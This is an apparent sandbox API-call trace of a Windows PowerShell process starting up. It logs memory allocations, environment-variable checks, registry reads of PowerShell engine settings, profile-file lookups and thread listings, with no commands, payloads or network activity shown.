	[0497.170] VirtualQuery (in: lpAddress=0x24b7b0, lpBuffer=0x24c670, dwLength=0x30 | out: lpBuffer=0x24c670*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0497.175] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0497.175] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0497.175] CoTaskMemFree (pv=0x1b91f1c0) 
	[0497.186] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0497.186] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0497.186] CoTaskMemFree (pv=0x1b91f1c0) 
	[0497.187] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0497.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0497.187] CoTaskMemFree (pv=0x1b91f1c0) 
	[0497.187] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0497.187] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0497.187] CoTaskMemFree (pv=0x1b91f1c0) 
	[0497.836] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0497.836] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0497.836] CoTaskMemFree (pv=0x1b91f1c0) 
	[0497.841] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0497.841] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0497.842] CoTaskMemFree (pv=0x1b91f1c0) 
	[0497.843] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0497.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0497.843] CoTaskMemFree (pv=0x1b91f1c0) 
	[0497.849] VirtualQuery (in: lpAddress=0x24b7b0, lpBuffer=0x24c670, dwLength=0x30 | out: lpBuffer=0x24c670*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0499.330] VirtualQuery (in: lpAddress=0x24b7b0, lpBuffer=0x24c670, dwLength=0x30 | out: lpBuffer=0x24c670*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0499.337] CoTaskMemAlloc (cb=0x104) returned 0x1b91f1c0
	[0499.337] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f1c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0499.337] CoTaskMemFree (pv=0x1b91f1c0) 
	[0500.687] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b91f2d0
	[0500.688] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1b91f3e0
	[0504.219] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0504.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.219] CoTaskMemFree (pv=0x1b91f4f0) 
	[0504.227] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0504.227] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0504.227] CoTaskMemFree (pv=0x1b91f4f0) 
	[0504.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0504.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0504.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0504.228] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0505.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0505.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0505.269] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0505.270] VirtualQuery (in: lpAddress=0x24ba60, lpBuffer=0x24c920, dwLength=0x30 | out: lpBuffer=0x24c920*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0505.275] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d8b8 | out: phkResult=0x24d8b8*=0x30c) returned 0x0
	[0505.275] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d83c, lpData=0x0, lpcbData=0x24d838*=0x0 | out: lpType=0x24d83c*=0x1, lpData=0x0, lpcbData=0x24d838*=0x56) returned 0x0
	[0505.275] CoTaskMemAlloc (cb=0x5a) returned 0x1b943bb0
	[0505.275] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d80c, lpData=0x1b943bb0, lpcbData=0x24d808*=0x56 | out: lpType=0x24d80c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d808*=0x56) returned 0x0
	[0505.276] CoTaskMemFree (pv=0x1b943bb0) 
	[0505.276] RegCloseKey (hKey=0x30c) returned 0x0
	[0505.276] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d8b8 | out: phkResult=0x24d8b8*=0x30c) returned 0x0
	[0505.276] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d83c, lpData=0x0, lpcbData=0x24d838*=0x0 | out: lpType=0x24d83c*=0x1, lpData=0x0, lpcbData=0x24d838*=0x56) returned 0x0
	[0505.276] CoTaskMemAlloc (cb=0x5a) returned 0x1b943bb0
	[0505.276] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d80c, lpData=0x1b943bb0, lpcbData=0x24d808*=0x56 | out: lpType=0x24d80c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d808*=0x56) returned 0x0
	[0505.276] CoTaskMemFree (pv=0x1b943bb0) 
	[0505.276] RegCloseKey (hKey=0x30c) returned 0x0
	[0505.276] CoTaskMemAlloc (cb=0x20c) returned 0x1b918ba0
	[0505.277] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b918ba0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0505.277] CoTaskMemFree (pv=0x1b918ba0) 
	[0505.277] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0505.277] CoTaskMemAlloc (cb=0x20c) returned 0x1b918ba0
	[0505.277] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x1b918ba0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0505.277] CoTaskMemFree (pv=0x1b918ba0) 
	[0505.277] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x24d470, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0505.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0505.278] SetErrorMode (uMode=0x1) returned 0x1
	[0505.278] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d820 | out: lpFileInformation=0x24d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0505.279] SetErrorMode (uMode=0x1) returned 0x1
	[0505.279] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0505.279] SetErrorMode (uMode=0x1) returned 0x1
	[0505.279] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d820 | out: lpFileInformation=0x24d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0505.279] SetErrorMode (uMode=0x1) returned 0x1
	[0505.279] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x24d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0505.279] SetErrorMode (uMode=0x1) returned 0x1
	[0505.279] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d820 | out: lpFileInformation=0x24d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0505.279] SetErrorMode (uMode=0x1) returned 0x1
	[0505.280] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x24d610, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0505.280] SetErrorMode (uMode=0x1) returned 0x1
	[0505.280] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x24d820 | out: lpFileInformation=0x24d820*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0505.280] SetErrorMode (uMode=0x1) returned 0x1
	[0505.280] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0505.280] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.280] CoTaskMemFree (pv=0x1b91f4f0) 
	[0505.281] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0505.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.281] CoTaskMemFree (pv=0x1b91f4f0) 
	[0505.281] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0505.281] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.281] CoTaskMemFree (pv=0x1b91f4f0) 
	[0505.282] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0505.282] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.282] CoTaskMemFree (pv=0x1b91f4f0) 
	[0505.286] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0505.286] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.286] CoTaskMemFree (pv=0x1b91f4f0) 
	[0505.288] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x30c
	[0505.288] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x310
	[0505.288] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x314
	[0505.288] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x318
	[0505.288] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x31c
	[0505.288] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x320
	[0505.288] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x380
	[0505.288] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0505.289] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x334
	[0505.289] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x338
	[0505.289] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x33c
	[0505.289] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x340
	[0505.291] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0505.291] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.291] CoTaskMemFree (pv=0x1b91f4f0) 
	[0505.294] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0505.294] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x24da00 | out: lpMode=0x24da00) returned 1
	[0505.629] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0505.629] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.629] CoTaskMemFree (pv=0x1b91f4f0) 
	[0505.633] SetEvent (hEvent=0x318) returned 1
	[0505.633] SetEvent (hEvent=0x30c) returned 1
	[0505.633] SetEvent (hEvent=0x310) returned 1
	[0505.634] SetEvent (hEvent=0x314) returned 1
	[0505.634] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x344
	[0505.636] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0505.636] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0505.636] CoTaskMemFree (pv=0x1b91f4f0) 
	[0505.637] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d758 | out: phkResult=0x24d758*=0x348) returned 0x0
	[0505.637] RegQueryValueExW (in: hKey=0x348, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x24d6dc, lpData=0x0, lpcbData=0x24d6d8*=0x0 | out: lpType=0x24d6dc*=0x0, lpData=0x0, lpcbData=0x24d6d8*=0x0) returned 0x2

Thread:
	id = 199
	os_tid = 0x2ac


Thread:
	id = 203
	os_tid = 0xad4


Thread:
	id = 383
	os_tid = 0xed0


Thread:
	id = 551
	os_tid = 0x13e4


Thread:
	id = 699
	os_tid = 0x15dc


Thread:
	id = 713
	os_tid = 0x15e0

	[0437.735] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0469.454] LocalFree (hMem=0x3c72b0) returned 0x0
	[0469.455] CloseHandle (hObject=0x198) returned 1
	[0469.455] CloseHandle (hObject=0x13) returned 1
	[0469.455] CloseHandle (hObject=0xf) returned 1
	[0469.456] RegCloseKey (hKey=0x2f4) returned 0x0
	[0469.456] RegCloseKey (hKey=0x2f0) returned 0x0
	[0469.456] RegCloseKey (hKey=0x2ec) returned 0x0
	[0469.456] LocalFree (hMem=0x3c7280) returned 0x0
	[0469.457] RegCloseKey (hKey=0x30c) returned 0x0
	[0477.743] RegCloseKey (hKey=0x30c) returned 0x0
	[0486.643] RegCloseKey (hKey=0x30c) returned 0x0
	[0486.643] RegCloseKey (hKey=0x2cc) returned 0x0
	[0498.581] RegCloseKey (hKey=0x37c) returned 0x0
	[0498.582] RegCloseKey (hKey=0x378) returned 0x0
	[0498.582] RegCloseKey (hKey=0x374) returned 0x0
	[0498.582] RegCloseKey (hKey=0x350) returned 0x0
	[0498.582] RegCloseKey (hKey=0x38c) returned 0x0
	[0498.583] RegCloseKey (hKey=0x36c) returned 0x0
	[0498.583] RegCloseKey (hKey=0x368) returned 0x0
	[0498.583] RegCloseKey (hKey=0x364) returned 0x0
	[0498.583] RegCloseKey (hKey=0x360) returned 0x0
	[0498.584] RegCloseKey (hKey=0x35c) returned 0x0
	[0498.584] RegCloseKey (hKey=0x358) returned 0x0
	[0498.584] RegCloseKey (hKey=0x354) returned 0x0
	[0498.584] RegCloseKey (hKey=0x32c) returned 0x0
	[0498.585] RegCloseKey (hKey=0x388) returned 0x0
	[0498.585] RegCloseKey (hKey=0x384) returned 0x0
	[0498.585] RegCloseKey (hKey=0x34c) returned 0x0
	[0498.585] RegCloseKey (hKey=0x348) returned 0x0
	[0498.585] RegCloseKey (hKey=0x344) returned 0x0
	[0498.586] RegCloseKey (hKey=0x340) returned 0x0
	[0498.586] RegCloseKey (hKey=0x33c) returned 0x0
	[0498.586] RegCloseKey (hKey=0x338) returned 0x0
	[0498.586] RegCloseKey (hKey=0x334) returned 0x0
	[0498.587] RegCloseKey (hKey=0x330) returned 0x0
	[0498.587] RegCloseKey (hKey=0x380) returned 0x0
	[0498.587] RegCloseKey (hKey=0x320) returned 0x0
	[0498.587] RegCloseKey (hKey=0x31c) returned 0x0
	[0498.588] RegCloseKey (hKey=0x318) returned 0x0
	[0498.588] RegCloseKey (hKey=0x314) returned 0x0
	[0498.588] RegCloseKey (hKey=0x310) returned 0x0
	[0498.588] RegCloseKey (hKey=0x30c) returned 0x0
	[0498.589] RegCloseKey (hKey=0x2cc) returned 0x0
	[0512.525] RegCloseKey (hKey=0x348) returned 0x0
	[0512.525] RegCloseKey (hKey=0x198) returned 0x0

Thread:
	id = 870
	os_tid = 0xc3c


Thread:
	id = 934
	os_tid = 0x18fc

	[0506.511] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0506.515] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0506.520] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0506.520] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0506.520] CoTaskMemFree (pv=0x1b91f4f0) 
	[0506.522] VirtualQuery (in: lpAddress=0x1c9ddde0, lpBuffer=0x1c9deca0, dwLength=0x30 | out: lpBuffer=0x1c9deca0*(BaseAddress=0x1c9dd000, AllocationBase=0x1c050000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0506.525] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0506.525] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0506.525] CoTaskMemFree (pv=0x1b91f4f0) 
	[0506.527] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0506.527] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0506.527] CoTaskMemFree (pv=0x1b91f4f0) 
	[0506.530] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0506.530] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0506.531] CoTaskMemFree (pv=0x1b91f4f0) 
	[0506.540] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0506.540] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0506.540] CoTaskMemFree (pv=0x1b91f4f0) 
	[0506.542] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0506.542] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0506.542] CoTaskMemFree (pv=0x1b91f4f0) 
	[0506.544] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0506.544] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0506.544] CoTaskMemFree (pv=0x1b91f4f0) 
	[0506.549] VirtualQuery (in: lpAddress=0x1c9de090, lpBuffer=0x1c9def50, dwLength=0x30 | out: lpBuffer=0x1c9def50*(BaseAddress=0x1c9de000, AllocationBase=0x1c050000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0506.550] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0506.550] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0506.550] CoTaskMemFree (pv=0x1b91f4f0) 
	[0507.147] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0507.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.147] CoTaskMemFree (pv=0x1b91f4f0) 
	[0507.147] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0507.147] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.147] CoTaskMemFree (pv=0x1b91f4f0) 
	[0507.149] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0507.149] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.149] CoTaskMemFree (pv=0x1b91f4f0) 
	[0507.154] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0507.154] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.154] CoTaskMemFree (pv=0x1b91f4f0) 
	[0507.754] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0507.754] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.754] CoTaskMemFree (pv=0x1b91f4f0) 
	[0507.757] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0507.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.757] CoTaskMemFree (pv=0x1b91f4f0) 
	[0507.758] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0507.758] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.758] CoTaskMemFree (pv=0x1b91f4f0) 
	[0507.761] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0507.761] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.761] CoTaskMemFree (pv=0x1b91f4f0) 
	[0507.763] CoTaskMemAlloc (cb=0x104) returned 0x1b91f4f0
	[0507.763] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1b91f4f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0507.763] CoTaskMemFree (pv=0x1b91f4f0) 
